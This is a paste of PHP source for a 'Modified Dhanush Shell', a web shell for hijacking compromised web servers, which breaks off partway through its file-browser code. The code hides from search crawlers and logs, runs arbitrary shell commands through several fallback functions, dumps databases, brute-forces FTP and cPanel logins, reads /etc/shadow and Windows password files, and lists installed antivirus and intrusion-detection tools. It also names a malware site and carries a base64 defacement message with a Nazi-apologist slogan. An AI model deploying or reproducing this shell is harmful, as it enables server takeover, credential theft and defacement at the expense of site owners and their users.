· 10 years ago · Jun 11, 2016, 11:30 AM
1<?php
2/*
3Modified Dhanush Shell
4Credits: Arjun (Coder of Dhanush Shell), Strab (Decoding the Shell), J3W (Modding it)
5*/
6$user = "QWRp"; //User as base64
7$pass = "SnVkZTEzMzc="; //Password as base64
8
9$malsite = "http://fightagent.ru"; // Malware Site
10
11$ind = "SGl0bGVyIGRpZCBub3RoaW5nIHdyb25nIQ=="; // "Deface Page" Base64 encoded "You Just Got Hacked !!"
12
13@set_magic_quotes_runtime(0);
14@ini_set('error_log',NULL);
15@ini_set('log_errors',0);
16ob_start();
17error_reporting(0);
18@set_time_limit(0);
19@ini_set('max_execution_time',0);
20@ini_set('output_buffering',0);
21
22if(!empty($_SERVER['HTTP_USER_AGENT']))
23{
24 $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
25 if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
26 header('HTTP/1.0 404 Not Found');
27 exit; }
28}
29// Dump Database
30$user = base64_decode($user);
31$pass = base64_decode($pass);
32if($_GET["action"] == "dumpDB")
33{
34 $self=$_SERVER["PHP_SELF"];
35 if(isset($_COOKIE['dbserver']))
36 {
37 $date = date("Y-m-d");
38 $dbserver = $_COOKIE["dbserver"];
39 $dbuser = $_COOKIE["dbuser"];
40 $dbpass = $_COOKIE["dbpass"];
41 $dbname = $_GET['dbname'];
42 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
43
44 $file = "Dump-$dbname-$date";
45
46 $file="Dump-$dbname-$date.sql";
47 $fp = fopen($file,"w");
48
49 function write($data)
50 {
51 global $fp;
52
53 fwrite($fp,$data);
54
55 }
56 mysql_connect ($dbserver, $dbuser, $dbpass);
57 mysql_select_db($dbname);
58 $tables = mysql_query ("SHOW TABLES");
59 while ($i = mysql_fetch_array($tables))
60 {
61 $i = $i['Tables_in_'.$dbname];
62 $create = mysql_fetch_array(mysql_query ("SHOW CREATE TABLE ".$i));
63 write($create['Create Table'].";");
64 $sql = mysql_query ("SELECT * FROM ".$i);
65 if (mysql_num_rows($sql)) {
66 while ($row = mysql_fetch_row($sql)) {
67 foreach ($row as $j => $k) {
68 $row[$j] = "'".mysql_escape_string($k)."'";
69 }
70 write("INSERT INTO $i VALUES(".implode(",", $row).");");
71 }
72 }
73 }
74
75 fclose ($fp);
76
77 header("Content-Disposition: attachment; filename=" . $file);
78 header("Content-Type: application/download");
79 header("Content-Length: " . filesize($file));
80 flush();
81
82 $fp = fopen($file, "r");
83 while (!feof($fp))
84 {
85 echo fread($fp, 65536);
86 flush();
87 }
88 fclose($fp);
89 }
90}
91function shellstyle()
92{
93 echo "<style type=\"text/css\">
94<!--
95
96body,td,th {
97 color: #FF0000;
98 font-size: 14px;
99}
100input.but {
101 background-color:#000000;
102 color:#FF0000;
103 border : 1px solid #1B1B1B;
104}
105a:link {
106 color: #00FF00;
107 text-decoration:none;
108 font-weight:500;
109}
110a:hover {
111 color:#00FF00;
112 text-decoration:underline;
113}
114font.txt
115{
116 color: #00FF00;
117 text-decoration:none;
118 font-size:14px;
119}
120font.mainmenu
121{
122 color:#FF0000;
123 text-decoration:none;
124 font-size:14px;
125}
126a:visited {
127 color: #006600;
128}
129input.box
130{
131 background-color:#0C0C0C;
132 color: lime;
133 border : 1px solid #1B1B1B;
134 -moz-border-radius:6px;
135 width:400;
136 border-radius:6px;
137}
138input.sbox
139{
140 background-color:#0C0C0C;
141 color: lime;
142 border : 1px solid #1B1B1B;
143 -moz-border-radius:6px;
144 width:180;
145 border-radius:6px;
146}
147select.sbox
148{
149 background-color:#0C0C0C;
150 color: lime;
151 border : 1px solid #1B1B1B;
152 -moz-border-radius:6px;
153 width:180;
154 border-radius:6px;
155}
156select.box
157{
158 background-color:#0C0C0C;
159 color: lime;
160 border : 1px solid #1B1B1B;
161 -moz-border-radius:6px;
162 width:400;
163 border-radius:6px;
164}
165
166textarea.box
167{
168 border : 3px solid #111;
169 background-color:#161616;
170 color : lime;
171 margin-top: 10px;
172 -moz-border-radius:7px;
173 border-radius:7px;
174}
175body {
176 background-color:#000000;
177}
178.myphp table
179{
180 width:100%;
181 padding:18px 10px;
182 border : 1px solid #1B1B1B;
183}
184.myphp td
185{
186 background:#111111;
187 color:#00ff00;
188 padding:6px 8px;
189 border-bottom:1px solid #222222;
190 font-size:14px;
191}
192.myphp th, th
193{
194 background:#181818;
195
196}
197-->
198</style>";
199}
200if(isset($_COOKIE['hacked']) && $_COOKIE['hacked']==md5($pass))
201{
202 $self=$_SERVER["PHP_SELF"];
203 $os = "N/D";
204 $bdmessage = null;
205 $dir = getcwd();
206
207 if(stristr(php_uname(),"Windows"))
208 {
209 $SEPARATOR = '\\';
210 $os = "Windows";
211 $directorysperator="\\";
212 }
213 else if(stristr(php_uname(),"Linux"))
214 {
215 $os = "Linux";
216 $directorysperator='/';
217 }
218 function Trail($d,$directsperator)
219 {
220 $d=explode($directsperator,$d);
221 array_pop($d);
222 array_pop($d);
223 $str=implode($d,$directsperator);
224 return $str;
225 }
226
227 function ftp_check($host,$user,$pass,$timeout)
228 {
229 $ch = curl_init();
230 curl_setopt($ch, CURLOPT_URL, "ftp://$host");
231 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
232 curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
233 curl_setopt($ch, CURLOPT_FTPLISTONLY, 1);
234 curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
235 curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
236 curl_setopt($ch, CURLOPT_FAILONERROR, 1);
237 $data = curl_exec($ch);
238 if ( curl_errno($ch) == 28 )
239 {
240 print "<center><b>
241 Error : Connection Timeout.
242 Please Check The Target Hostname .</b></center>";exit;
243 }
244 else if ( curl_errno($ch) == 0 )
245 {
246 print "<center><b>[~]</b><font class=txt>
247 Cracking Success With Username "</font><font color=\"#FF0000\">$user</font><font color=\"#008000\">\"
248 and Password \"</font><font color=\"#FF0000\">$pass</font><font color=\"#008000\">\"</font></b></center><br><br>";
249 }
250 curl_close($ch);
251 }
252
253 function cpanel_check($host,$user,$pass,$timeout)
254 {
255 global $cpanel_port;
256 $ch = curl_init();
257 curl_setopt($ch, CURLOPT_URL, "http://$host:" . $cpanel_port);
258 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
259 curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
260 curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
261 curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
262 curl_setopt($ch, CURLOPT_FAILONERROR, 1);
263 $data = curl_exec($ch);
264 if ( curl_errno($ch) == 28 )
265 { print "<center><b>Error : Connection Timeout.
266 Please Check The Target Hostname.</b></center>";exit;}
267 else if ( curl_errno($ch) == 0 ){
268 print "<ecnter><b>[~]</b><font class=txt><b>
269
270 Cracking Success With Username "</font><font color=\"#FF0000\">$user</font><font color=\"#008000\">\"
271 and Password \"</font><font color=\"#FF0000\">$pass</font><font color=\"#008000\">\"</font></b></center><br><br>";
272 }
273 curl_close($ch);
274 }
275
276 // Database functions
277 function listdatabase()
278 {
279 $self=$_SERVER["PHP_SELF"];
280 ?>
281 <br>
282 <form>
283 <table>
284 <tr>
285 <td><input type="text" class="box" name="dbname"></td>
286 <td><input type="button" onClick="viewtables('createDB',dbname.value)" value=" Create Database " class="but"></td>
287 </tr>
288 </table>
289 </form>
290 <br>
291 <?php
292 $mysqlHandle = mysql_connect ($_COOKIE['dbserver'], $_COOKIE['dbuser'], $_COOKIE['dbpass']);
293 $result = mysql_query("SHOW DATABASE");
294 echo "<table cellspacing=1 cellpadding=5 border=1 style=width:60%;>\n";
295
296 $pDB = mysql_list_dbs( $mysqlHandle );
297 $num = mysql_num_rows( $pDB );
298 for( $i = 0; $i < $num; $i++ )
299 {
300 $dbname = mysql_dbname( $pDB, $i );
301 mysql_select_db($dbname,$mysqlHandle);
302 $result = mysql_query("SHOW TABLES");
303 $num_of_tables = mysql_num_rows($result);
304 echo "<tr>\n";
305 echo "<td><a href=# onClick=\"viewtables('listTables','$dbname')\"><font size=3>$dbname</font></a> ($num_of_tables)</td>\n";
306 echo "<td><a href=# onClick=\"viewtables('listTables','$dbname')\">Tables</a></td>\n";
307 echo "<td><a href=# onClick=\"viewtables('dropDB','$dbname')\">Drop</a></td>\n";
308 echo "<td><a href='$self?action=dumpDB&dbname=$dbname' onClick=\"return confirm('Dump Database \'$dbname\'?')\">Dump</a></td>\n";
309 echo "</tr>\n";
310 }
311 echo "</table>\n";
312 mysql_close($mysqlHandle);
313 }
314
315 function listtable()
316 {
317 $self=$_SERVER["PHP_SELF"];
318 $dbserver = $_COOKIE["dbserver"];
319 $dbuser = $_COOKIE["dbuser"];
320 $dbpass = $_COOKIE["dbpass"];
321 $dbname = $_GET['dbname'];
322 echo "<div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>></font> <a href=# onClick=\"viewtables('viewdb')\"> <font size=3>Database List</font> </a> <a href=$self?logoutdb> <font size=3>[ Log Out ]</font> </a></div>";
323 ?>
324 <br><br>
325 <form>
326 <table>
327
328 <tr>
329 <td><input type="text" class="box" name="tablename"></td>
330 <td><input type="button" onClick="viewtables('createtable','<?php echo $_GET['dbname'];?>')" value=" Create Table " name="createmydb" class="but"></td>
331 </tr>
332 </table>
333
334 <br>
335 <form>
336 <table>
337 <tr>
338 <td><textarea cols="60" rows="7" name="executemyquery" class="box">Execute Query..</textarea></td>
339 </tr>
340 <tr>
341 <td><input type="button" onClick="viewtables('executequery','<?php echo $_GET['dbname'];?>','<?php echo $_GET['tablename']; ?>','','',executemyquery.value)" value="Execute" class="but"></td>
342 </tr>
343 </table>
344 </form>
345
346 <?php
347
348 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
349
350 mysql_select_db($dbname);
351 $pTable = mysql_list_tables( $dbname );
352
353 if( $pTable == 0 ) {
354 $msg = mysql_error();
355 echo "<h3>Error : $msg</h3><p>\n";
356 return;
357 }
358 $num = mysql_num_rows( $pTable );
359
360 echo "<table cellspacing=1 cellpadding=5 border=1 style=width:60%;>\n";
361
362 for( $i = 0; $i < $num; $i++ )
363 {
364 $tablename = mysql_tablename( $pTable, $i );
365 $result = mysql_query("select * from $tablename");
366 $num_rows = mysql_num_rows($result);
367 echo "<tr>\n";
368 echo "<td>\n";
369 echo "<a href=# onClick=\"viewtables('viewdata','$dbname','$tablename')\"><font size=3>$tablename</font></a> ($num_rows)\n";
370 echo "</td>\n";
371 echo "<td>\n";
372 echo "<a href=# onClick=\"viewtables('viewSchema','$dbname','$tablename')\">Schema</a>\n";
373 echo "</td>\n";
374 echo "<td>\n";
375 echo "<a href=# onClick=\"viewtables('viewdata','$dbname','$tablename')\">Data</a>\n";
376 echo "</td>\n";
377 echo "<td>\n";
378 echo "<a href=# onClick=\"viewtables('empty','$dbname','$tablename')\">Empty</a>\n";
379 echo "</td>\n";
380 echo "<td>\n";
381 echo "<a href=# onClick=\"viewtables('dropTable','$dbname','$tablename')\">Drop</a>\n";
382 echo "</td>\n";
383 echo "</tr>\n";
384 }
385
386 echo "</table></form>";
387 mysql_close($mysqlHandle);
388 echo "<div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>></font> <a href=# onClick=\"viewtables('viewdb')\"> <font size=3>Database List</font> </a> <a href=$self?logoutdb> <font size=3>[ Log Out ]</font> </a></div>";
389 }
390
391
392 function paramexe($n, $v)
393 {
394 $v = trim($v);
395 if($v)
396 {
397 echo '<span><font size=3>' . $n . ': </font></span>';
398 if(strpos($v, "\n") === false)
399 echo '<font size=2>' . $v . '</font><br>';
400 else
401 echo '<pre class=ml1><font class=txt size=3>' . $v . '</font></pre>';
402 }
403 }
404
405
406
407 function rrmdir($dir)
408 {
409 if (is_dir($dir)) // ensures that we actually have a directory
410 {
411 $objects = scandir($dir); // gets all files and folders inside
412 foreach ($objects as $object)
413 {
414 if ($object != '.' && $object != '..')
415 {
416 if (is_dir($dir . '/' . $object))
417 {
418 // if we find a directory, do a recursive call
419 rrmdir($dir . '/' . $object);
420 }
421 else
422 {
423 // if we find a file, simply delete it
424 unlink($dir . '/' . $object);
425 }
426 }
427 }
428 // the original directory is now empty, so delete it
429 rmdir($dir);
430 }
431 }
432
433 function which($pr)
434 {
435 $path = execmd("which $pr");
436 if(!empty($path))
437 return trim($path);
438 else
439 return trim($pr);
440 }
441
442 function magicboom($text)
443 {
444 if (!get_magic_quotes_gpc())
445 return $text;
446 return stripslashes($text);
447 }
448
449function execmd($cmd,$d_functions="None")
450{
451 if($d_functions=="None")
452 {
453 $ret=passthru($cmd);
454 return $ret;
455 }
456 $funcs=array("shell_exec","exec","passthru","system","popen","proc_open");
457 $d_functions=str_replace(" ","",$d_functions);
458 $dis_funcs=explode(",",$d_functions);
459 foreach($funcs as $safe)
460 {
461 if(!in_array($safe,$dis_funcs))
462 {
463 if($safe=="exec")
464 {
465 $ret=@exec($cmd);
466 $ret=join("\n",$ret);
467 return $ret;
468 }
469 elseif($safe=="system")
470 {
471 $ret=@system($cmd);
472 return $ret;
473 }
474 elseif($safe=="passthru")
475 {
476 $ret=@passthru($cmd);
477 return $ret;
478 }
479 elseif($safe=="shell_exec")
480 {
481 $ret=@shell_exec($cmd);
482 return $ret;
483 }
484 elseif($safe=="popen")
485 {
486 $ret=@popen("$cmd",'r');
487 if(is_resource($ret))
488 {
489 while(@!feof($ret))
490 $read.=@fgets($ret);
491 @pclose($ret);
492 return $read;
493 }
494 return -1;
495 }
496 elseif($safe="proc_open")
497 {
498 $cmdpipe=array(
499 0=>array('pipe','r'),
500 1=>array('pipe','w')
501 );
502 $resource=@proc_open($cmd,$cmdpipe,$pipes);
503 if(@is_resource($resource))
504 {
505 while(@!feof($pipes[1]))
506 $ret.=@fgets($pipes[1]);
507 @fclose($pipes[1]);
508 @proc_close($resource);
509 return $ret;
510 }
511 return -1;
512 }
513 }
514 }
515 return -1;
516}
517
518 function getDisabledFunctions()
519 {
520 if(!ini_get('disable_functions'))
521 {
522 return "None";
523 }
524 else
525 {
526 return @ini_get('disable_functions');
527 }
528 }
529
530 function getFilePermissions($file)
531 {
532 $perms = fileperms($file);
533
534 if (($perms & 0xC000) == 0xC000) {
535 // Socket
536 $info = 's';
537 } elseif (($perms & 0xA000) == 0xA000) {
538 // Symbolic Link
539 $info = 'l';
540 } elseif (($perms & 0x8000) == 0x8000) {
541 // Regular
542 $info = '-';
543 } elseif (($perms & 0x6000) == 0x6000) {
544 // Block special
545 $info = 'b';
546 } elseif (($perms & 0x4000) == 0x4000) {
547 // Directory
548 $info = 'd';
549 } elseif (($perms & 0x2000) == 0x2000) {
550 // Character special
551 $info = 'c';
552 } elseif (($perms & 0x1000) == 0x1000) {
553 // FIFO pipe
554 $info = 'p';
555 } else {
556 // Unknown
557 $info = 'u';
558 }
559
560 // Owner
561 $info .= (($perms & 0x0100) ? 'r' : '-');
562 $info .= (($perms & 0x0080) ? 'w' : '-');
563 $info .= (($perms & 0x0040) ?
564 (($perms & 0x0800) ? 's' : 'x' ) :
565 (($perms & 0x0800) ? 'S' : '-'));
566
567 // Group
568 $info .= (($perms & 0x0020) ? 'r' : '-');
569 $info .= (($perms & 0x0010) ? 'w' : '-');
570 $info .= (($perms & 0x0008) ?
571 (($perms & 0x0400) ? 's' : 'x' ) :
572 (($perms & 0x0400) ? 'S' : '-'));
573
574 // World
575 $info .= (($perms & 0x0004) ? 'r' : '-');
576 $info .= (($perms & 0x0002) ? 'w' : '-');
577 $info .= (($perms & 0x0001) ?
578 (($perms & 0x0200) ? 't' : 'x' ) :
579 (($perms & 0x0200) ? 'T' : '-'));
580
581 return $info;
582}
583 function filepermscolor($filename)
584 {
585 if(!@is_readable($filename))
586 return "<font color=\"#FF0000\">".getFilePermissions($filename)."</font>";
587 else if(!@is_writable($filename))
588 return "<font color=\"#FFFFFF\">".getFilePermissions($filename)."</font>";
589 else
590 return "<font color=\"#00FF00\">".getFilePermissions($filename)."</font>";
591 }
592
593 function yourip()
594 {
595 echo $_SERVER["REMOTE_ADDR"];
596 }
597 function phpver()
598 {
599 $pv=@phpversion();
600 echo $pv;
601 }
602 function magic_quote()
603 {
604 echo get_magic_quotes_gpc()?"<font class=txt>ON</font>":"<font color='red'>OFF</font>";
605 }
606 function serverip()
607 {
608 echo getenv('SERVER_ADDR');
609 }
610 function serverport()
611 {
612 echo $_SERVER['SERVER_PORT'];
613 }
614 function safe()
615 {
616 global $sm;
617 return $sm?"ON :( :'( (Most of the Features will Not Work!)":"OFF";
618 }
619 function serveradmin()
620 {
621 echo $_SERVER['SERVER_ADMIN'];
622 }
623 function systeminfo()
624 {
625 echo php_uname();
626 }
627 function curlinfo()
628 {
629 echo function_exists('curl_version')?("<font class=txt>Enabled</font>"):("<font color='red'>Disabled</font>");
630 }
631 function oracleinfo()
632 {
633 echo function_exists('ocilogon')?("<font class=txt>Enabled</font>"):("<font color='red'>Disabled</font>");
634 }
635 function mysqlinfo()
636 {
637 echo function_exists('mysql_connect')?("<font class=txt>Enabled</font>"):("<font color='red'>Disabled</font>");
638 }
639 function mssqlinfo()
640 {
641 echo function_exists('mssql_connect')?("<font class=txt>Enabled</font>"):("<font color='red'>Disabled</font>");
642 }
643 function postgresqlinfo()
644 {
645 echo function_exists('pg_connect')?("<font class=txt>Enabled</font>"):("<font color='red'>Disabled</font>");
646 }
647 function softwareinfo()
648 {
649 echo getenv("SERVER_SOFTWARE");
650 }
651 function download()
652 {
653 $frd=$_GET['download'];
654 $prd=explode("/",$frd);
655 for($i=0;$i<sizeof($prd);$i++)
656 {
657 $nfd=$prd[$i];
658 }
659 @ob_clean();
660 header("Content-type: application/octet-stream");
661 header("Content-length: ".filesize($nfd));
662 header("Content-disposition: attachment; filename=\"".$nfd."\";");
663 readfile($nfd);
664
665 exit;
666
667 }
668
669 function HumanReadableFilesize($size)
670 {
671 $mod = 1024;
672 $units = explode(' ','B KB MB GB TB PB');
673 for ($i = 0; $size > $mod; $i++)
674 {
675 $size /= $mod;
676 }
677 return round($size, 2) . ' ' . $units[$i];
678 }
679
680 function showDrives()
681 {
682 global $self;
683 foreach(range('A','Z') as $drive)
684 {
685 if(is_dir($drive.':\\'))
686 {
687 $myd = $drive.":\\";
688 ?>
689 <a href=javascript:void(0) onClick="changedir('dir','<?php echo addslashes($myd); ?>')">
690 <?php echo $myd; ?>
691 </a>
692 <?php
693 }
694 }
695 }
696 function diskSpace()
697 {
698 return disk_total_space("/");
699 }
700 function freeSpace()
701 {
702 return disk_free_space("/");
703 }
704
705 function thiscmd($p)
706 {
707 $path = myexe('which ' . $p);
708 if(!empty($path))
709 return $path;
710 return false;
711 }
712
713 function mysecinfo()
714 {
715 function myparam($n, $v)
716 {
717 $v = trim($v);
718 if($v)
719 {
720 echo '<span><font color =red size=3>' . $n . ': </font></span>';
721 if(strpos($v, "\n") === false)
722 echo '<font color =lime size=3>' . $v . '</font><br>';
723 else
724 echo '<pre class=ml1><font color =lime size=3>' . $v . '</font></pre>';
725 }
726 }
727
728 myparam('Server software', @getenv('SERVER_SOFTWARE'));
729 if(function_exists('apache_get_modules'))
730 myparam('Loaded Apache modules', implode(', ', apache_get_modules()));
731 myparam('Open base dir', @ini_get('open_basedir'));
732 myparam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));
733 myparam('Safe mode include dir', @ini_get('safe_mode_include_dir'));
734 $temp=array();
735 if(function_exists('mysql_get_client_info'))
736 $temp[] = "MySql (".mysql_get_client_info().")";
737 if(function_exists('mssql_connect'))
738 $temp[] = "MSSQL";
739 if(function_exists('pg_connect'))
740 $temp[] = "PostgreSQL";
741 if(function_exists('oci_connect'))
742 $temp[] = "Oracle";
743 myparam('Supported databases', implode(', ', $temp));
744 echo '<br>';
745
746 if($GLOBALS['os'] == 'Linux') {
747 myparam('Distro : ', myexe("cat /etc/*-release"));
748 myparam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes <a href=javascript:void(0) onClick=\"getmydata('passwd')\">[view]</a>":'no');
749 myparam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes <a href=javascript:void(0) onClick=\"getmydata('shadow')\">[view]</a>":'no');
750 myparam('OS version', @file_get_contents('/proc/version'));
751 myparam('Distr name', @file_get_contents('/etc/issue.net'));
752 myparam('Where is Perl?', myexe('whereis perl'));
753 myparam('Where is Python?', myexe('whereis python'));
754 myparam('Where is gcc?', myexe('whereis gcc'));
755 myparam('Where is apache?', myexe('whereis apache'));
756 myparam('CPU?', myexe('cat /proc/cpuinfo'));
757 myparam('RAM', myexe('free -m'));
758 myparam('Mount options', myexe('cat /etc/fstab'));
759 myparam('User Limits', myexe('ulimit -a'));
760
761
762 if(!$GLOBALS['safe_mode']) {
763 $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
764 $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');
765 $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
766 echo '<br>';
767 $temp=array();
768 foreach ($userful as $item)
769 if(thiscmd($item))
770 $temp[] = $item;
771 myparam('Userful', implode(', ',$temp));
772 $temp=array();
773 foreach ($danger as $item)
774 if(thiscmd($item))
775 $temp[] = $item;
776 myparam('Danger', implode(', ',$temp));
777 $temp=array();
778 foreach ($downloaders as $item)
779 if(thiscmd($item))
780 $temp[] = $item;
781 myparam('Downloaders', implode(', ',$temp));
782 echo '<br/>';
783 myparam('HDD space', myexe('df -h'));
784 myparam('Hosts', @file_get_contents('/etc/hosts'));
785
786 }
787 } else {
788 $repairsam = addslashes($_SERVER["WINDIR"]."\\repair\\sam");
789 $hostpath = addslashes($_SERVER["WINDIR"]."\system32\drivers\etc\hosts");
790 $netpath = addslashes($_SERVER["WINDIR"]."\system32\drivers\etc\\networks");
791 $sampath = addslashes($_SERVER["WINDIR"]."\system32\drivers\etc\lmhosts.sam");
792 echo "<font size=3>Password File : </font><a href=".$_SERVER['PHP_SELF']."?download=" . $repairsam ."><b><font class=txt size=3>Download password file</font></b></a><br>";
793 echo "<font size=3>Config Files : </font><a href=javascript:void(0) onClick=\"fileaction('open','$hostpath')\"><b><font class=txt size=3>[ Hosts ]</font></b></a> <a href=javascript:void(0) onClick=\"fileaction('open','$netpath')\"><b><font class=txt size=3>[ Local Network Map ]</font></b></a> <a href=javascript:void(0) onClick=\"fileaction('open','$sampath')\"><b><font class=txt size=3>[ lmhosts ]</font></b></a><br>";
794 $base = (ini_get("open_basedir") or strtoupper(ini_get("open_basedir"))=="ON")?"ON":"OFF";
795 echo "<font size=3>Open Base Dir : </font><font class=txt size=3>" . $base . "</font><br>";
796 myparam('OS Version',myexe('ver'));
797 myparam('Account Settings',myexe('net accounts'));
798 myparam('User Accounts',myexe('net user'));
799 }
800 echo '</div>';
801 }
802
803
804
805 function myexe($in)
806 {
807 $out = '';
808 if (function_exists('exec')) {
809 @exec($in,$out);
810 $out = @join("\n",$out);
811 } elseif (function_exists('passthru')) {
812 ob_start();
813 @passthru($in);
814 $out = ob_get_clean();
815 } elseif (function_exists('system')) {
816 ob_start();
817 @system($in);
818 $out = ob_get_clean();
819 } elseif (function_exists('shell_exec')) {
820 $out = shell_exec($in);
821 } elseif (is_resource($f = @popen($in,"r"))) {
822 $out = "";
823 while(!@feof($f))
824 $out .= fread($f,1024);
825 pclose($f);
826 }
827 return $out;
828}
829
830 function exec_all($command)
831 {
832
833 $output = '';
834 if(function_exists('exec'))
835 {
836 exec($command,$output);
837 $output = join("\n",$output);
838 }
839
840 else if(function_exists('shell_exec'))
841 {
842 $output = shell_exec($command);
843 }
844
845 else if(function_exists('popen'))
846 {
847 $handle = popen($command , "r"); // Open the command pipe for reading
848 if(is_resource($handle))
849 {
850 if(function_exists('fread') && function_exists('feof'))
851 {
852 while(!feof($handle))
853 {
854 $output .= fread($handle, 512);
855 }
856 }
857 else if(function_exists('fgets') && function_exists('feof'))
858 {
859 while(!feof($handle))
860 {
861 $output .= fgets($handle,512);
862 }
863
864
865
866 }
867 }
868 pclose($handle);
869 }
870
871
872 else if(function_exists('system'))
873 {
874 ob_start(); //start output buffering
875 system($command);
876 $output = ob_get_contents(); // Get the ouput
877 ob_end_clean(); // Stop output buffering
878 }
879
880 else if(function_exists('passthru'))
881 {
882 ob_start(); //start output buffering
883 passthru($command);
884 $output = ob_get_contents(); // Get the ouput
885 ob_end_clean(); // Stop output buffering
886 }
887
888 else if(function_exists('proc_open'))
889 {
890 $descriptorspec = array(
891 1 => array("pipe", "w"), // stdout is a pipe that the child will write to
892 );
893 $handle = proc_open($command ,$descriptorspec , $pipes); // This will return the output to an array 'pipes'
894 if(is_resource($handle))
895 {
896 if(function_exists('fread') && function_exists('feof'))
897 {
898 while(!feof($pipes[1]))
899 {
900 $output .= fread($pipes[1], 512);
901 }
902 }
903 else if(function_exists('fgets') && function_exists('feof'))
904 {
905 while(!feof($pipes[1]))
906 {
907 $output .= fgets($pipes[1],512);
908 }
909 }
910 }
911 pclose($handle);
912 }
913
914 return(htmlspecialchars($output));
915
916}
917
918$basedir=(ini_get("open_basedir") or strtoupper(ini_get("open_basedir"))=="ON")?"<font class=txt>ON</font>":"<font color='red'>OFF</font>";
919$etc_passwd=@is_readable("/etc/passwd")?"Yes":"No";
920
921function getOGid($value)
922{
923 if(!function_exists('posix_getegid')) {
924 $user = @get_current_user();
925 $uid = @getmyuid();
926 $gid = @getmygid();
927 $group = "?";
928 $owner = $uid . "/". $gid;
929 return $owner;
930 } else {
931 $name=@posix_getpwuid(@fileowner($value));
932 $group=@posix_getgrgid(@filegroup($value));
933 $owner = $name['name']. " / ". $group['name'];
934 return $owner;
935 }
936}
937
938function mainfun($dir)
939{
940 global $ind, $directorysperator,$os;
941
942 $mydir = basename(dirname(__FILE__));
943 $pdir = str_replace($mydir,"",$dir);
944 $pdir = str_replace("/","",$dir);
945
946 $files = array();
947 $dirs = array();
948
949 $odir=opendir($dir);
950 while($file = readdir($odir))
951 {
952 if(is_dir($dir.'/'.$file))
953 {
954 $dirs[]=$file;
955 }
956 else
957 {
958 $files[]=$file;
959 }
960 }
961 $countfiles = count($dirs) + count($files);
962 $dircount = count($dirs);
963 $dircount = $dircount-2;
964 $myfiles = array_merge($dirs,$files);
965 $i = 0;
966 if(is_dir($dir))
967 {
968 if(scandir($dir) === false)
969 echo "<center><font size=3>Directory isn't readable</font></center>";
970 else
971 {
972?><form method="post" id="myform" name="myform">
973 <table id="maintable" style="width:100%;" align="center" cellpadding="3">
974 <tr><td colspan="7"><center><div id="showmydata"></div></center></td></tr>
975 <tr style="background-color:#0C0C0C;"><td colspan="8" align="center"><font size="3">Listing folder <?php echo $dir; ?></font> (<?php echo $dircount.' Dirs And '.count($files).' Files'; ?>)</td>
976 <tr style="background-color:#0C0C0C; height:12px;">
977 <th>Name</th>
978 <th>Size</th>
979 <th>Permissions</th>
980 <?php if($os != "Windows"){ echo "<th>Owner / Group</th>"; } ?>
981 <th>Modification Date</th>
982 <th>Rename</th>
983 <th>Download</th>
984 <th style="width:2%;">Action</th>
985 </tr>
986 <?php
987 foreach($myfiles as $val)
988 {
989 $vv = addslashes($dir . $directorysperator . $val);
990 $i++;
991
992 if($val == ".")
993 {
994
995 ?><tr style="background-color:#0C0C0C;" onMouseOver="style.backgroundColor='#000000'" onMouseOut="style.backgroundColor='#0C0C0C'"><td class='info'><a href=javascript:void(0) onClick="changedir('dir','<?php echo addslashes($dir); ?>')"><font class=txt>[ . ]</font></a></td><td><font size=2>CURDIR</font></td>
996 <td><a href=javascript:void(0) onClick="fileaction('perms','<?php echo $vv; ?>')"><?php echo filepermscolor($dir); ?></a></td>
997
998 <?php if($os != 'Windows')
999 {
1000 echo "<td align=center><font size=2>";
1001 echo getOGid($dir)."</font></td>";
1002 }
1003 ?>
1004
1005 <td align="center"><font class=txt><?php echo date('Y-m-d H:i:s', @filemtime($vv)); ?></font></td>
1006 <td></td><td></td><td></td></</tr><?php
1007
1008 }
1009 else if($val == "..")
1010 {
1011 $val = Trail($dir . $directorysperator . $val,$directorysperator);
1012 $vv = addslashes($val);
1013 if(empty($vv))
1014 $vv = "/"; ?>
1015 <tr style="background-color:#0C0C0C;" onMouseOver="style.backgroundColor='#000000'" onMouseOut="style.backgroundColor='#0C0C0C'"><td class='info'><a href=javascript:void(0) onClick="changedir('dir','<?php echo $vv; ?>')"><font class=txt>[ .. ]</font></a></td><td><font size=2>UPDIR</font></td>
1016 <td><a href=javascript:void(0) onClick="fileaction('perms','<?php echo $vv; ?>')"><?php echo filepermscolor($val); ?></a></td>
1017 <?php if($os != 'Windows')
1018 {
1019 echo "<td align=center><font size=2>";
1020 echo getOGid($val)."</font></td>";
1021
1022 } ?>
1023 <td align="center"><font class=txt><?php echo date('Y-m-d H:i:s', @filemtime($val)); ?></font></td>
1024 <td></td><td></td><td></td></tr><?php continue;
1025 }
1026 else if(is_dir($vv))
1027 {
1028 ?>
1029 <tr style="background-color:#0C0C0C;" onMouseOver="style.backgroundColor='#000000'" onMouseOut="style.backgroundColor='#0C0C0C'">
1030 <td class='dir'><a href=javascript:void(0) onClick="changedir('dir','<?php echo $vv; ?>')">[ <?php echo $val; ?> ]</a></td>
1031 <td class='info'><font size=2>DIR</font></td>
1032
